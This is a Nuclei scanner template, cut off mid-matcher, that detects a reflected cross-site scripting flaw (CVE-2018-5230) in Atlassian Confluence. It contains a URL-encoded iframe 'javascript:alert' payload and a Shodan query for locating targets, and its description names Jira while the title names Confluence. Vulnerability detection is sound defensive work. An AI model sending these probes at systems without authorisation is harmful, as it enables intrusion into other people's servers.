id: CVE-2018-5230 info: name: Atlassian Confluence Status-List XSS author: madrobot severity: medium description: | The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified. reference: - https://jira.atlassian.com/browse/JRASERVER-67289 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-5230 cwe-id: CWE-79 metadata: shodan-query: http.component:"Atlassian Confluence" tags: cve,cve2018,atlassian,confluence,xss requests: - method: GET path: - "{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm" matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - '